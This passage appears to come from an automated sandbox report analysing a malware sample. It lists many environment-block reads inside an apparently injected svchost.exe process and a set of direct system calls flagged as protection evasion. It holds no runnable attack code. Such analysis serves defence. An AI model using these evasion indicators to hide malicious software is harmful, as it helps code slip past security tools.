                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h] (5 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h] (5 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h] (8 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h] (3 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h] (8 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h] (3 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h] (3 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h] (3 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h] (7 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h] (4 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h] (9 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h] (3 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h] (3 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h] (3 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h] (7 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h] (3 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h] (3 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] (9 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h] (3 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h] (6 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] (13 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h] (2 matches)
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D280A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CFA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CFA124 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtProtectVirtualMemory: Direct from: 0x77542F9C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtSetInformationProcess: Direct from: 0x77542C5C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtOpenKeyEx: Direct from: 0x77542B9C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtClose: Direct from: 0x77537B2E
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtCreateFile: Direct from: 0x77542FEC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtOpenFile: Direct from: 0x77542DCC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtQueryInformationToken: Direct from: 0x77542CAC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtTerminateThread: Direct from: 0x77542FCC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtDeviceIoControlFile: Direct from: 0x77542AEC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtAllocateVirtualMemory: Direct from: 0x77542BEC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtQueryVolumeInformationFile: Direct from: 0x77542F2C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtOpenSection: Direct from: 0x77542E0C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtAllocateVirtualMemory: Direct from: 0x775448EC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtSetInformationThread: Direct from: 0x775363F9
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtQuerySystemInformation: Direct from: 0x775448CC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtClose: Direct from: 0x77542B6C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtReadVirtualMemory: Direct from: 0x77542E8C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtCreateKey: Direct from: 0x77542C6C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtSetInformationThread: Direct from: 0x77542B4C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtQueryAttributesFile: Direct from: 0x77542E6C
